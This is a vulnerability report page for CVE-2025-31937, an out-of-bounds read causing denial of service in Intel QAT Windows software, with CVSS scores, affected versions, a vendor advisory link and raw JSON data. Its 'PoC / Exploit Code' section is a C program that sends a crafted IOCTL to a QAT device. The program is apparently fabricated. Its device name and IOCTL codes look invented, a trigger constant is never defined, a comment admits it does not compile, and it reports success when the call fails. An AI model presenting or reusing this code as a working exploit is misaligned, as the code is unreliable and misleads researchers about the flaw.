Security Vulnerability Report
CVE-2025-31937 CVSS 5.6 MEDIUM

CVE-2025-31937

Published: 2025-11-11 17:15:48
Last Modified: 2025-11-26 15:40:49

Description

Out-of-bounds read for some Intel(R) QAT Windows software before version 2.6.0. within Ring 3: User Applications may allow a denial of service. System software adversary with an authenticated user combined with a high complexity attack may enable denial of service. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.

CVSS Details

CVSS Score: 5.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:intel:quickassist_technology:*:*:*:*:*:windows:*:* - VULNERABLE
Intel QAT Windows software < 2.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2025-31937 PoC - Intel QAT Windows Out-of-Bounds Read
// This PoC demonstrates the vulnerability in Intel QAT driver
// Note: This is a conceptual PoC for educational purposes only
#include <windows.h>
#include <stdio.h>
#include <string.h>

// Intel QAT driver IOCTL codes
#define QAT_IOCTL_BASE    0x8000
#define QAT_IOCTL_PROCESS (QAT_IOCTL_BASE + 0x01)

typedef struct _QAT_REQUEST {
    ULONG InputBufferSize;
    ULONG OutputBufferSize;
    PVOID InputBuffer;
    PVOID OutputBuffer;
    ULONG OperationType;
} QAT_REQUEST, *PQAT_REQUEST;

int main(void)
{
    HANDLE hDevice;
    QAT_REQUEST request;
    DWORD bytesReturned = 0;

    // Open Intel QAT device handle
    hDevice = CreateFileA("\\\\.\\QATDriver",
                          GENERIC_READ | GENERIC_WRITE,
                          FILE_SHARE_READ | FILE_SHARE_WRITE,
                          NULL, OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open QAT device\n");
        return 1;
    }
    printf("[+] Device handle obtained\n");

    // Prepare malicious request to trigger OOB read
    request.InputBufferSize = 0x1000;
    request.OutputBufferSize = 0x100;
    // MALICIOUS_OPERATION is not defined anywhere on this page,
    // so this file does not compile as given.
    request.OperationType = MALICIOUS_OPERATION; // Trigger condition

    // Allocate buffers
    request.InputBuffer = VirtualAlloc(NULL, request.InputBufferSize,
                                       MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    request.OutputBuffer = VirtualAlloc(NULL, request.OutputBufferSize,
                                        MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (request.InputBuffer == NULL || request.OutputBuffer == NULL) {
        printf("[-] Buffer allocation failed\n");
        CloseHandle(hDevice);
        return 1;
    }

    // Fill input buffer with trigger pattern
    memset(request.InputBuffer, 0x41, request.InputBufferSize);

    printf("[*] Sending malicious request to trigger OOB read...\n");

    // Trigger the vulnerability
    BOOL result = DeviceIoControl(hDevice, QAT_IOCTL_PROCESS,
                                  &request, sizeof(request),
                                  &request, sizeof(request),
                                  &bytesReturned, NULL);
    if (!result) {
        printf("[+] OOB read triggered - system may crash or hang\n");
        printf("[+] Check for DoS condition\n");
    }

    CloseHandle(hDevice);
    return 0;
}

References

https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01373.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-31937", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:48.243", "lastModified": "2025-11-26T15:40:49.013", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds read for some Intel(R) QAT Windows software before version 2.6.0. within Ring 3: User Applications may allow a denial of service. System software adversary with an authenticated user combined with a high complexity attack may enable denial of service. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:H", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.1, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intel:quickassist_technology:*:*:*:*:*:windows:*:*", "versionEndExcluding": "2.6.0-0018", "matchCriteriaId": "6416303E-851F-4530-875E-D349969919BE"}]}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01373.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}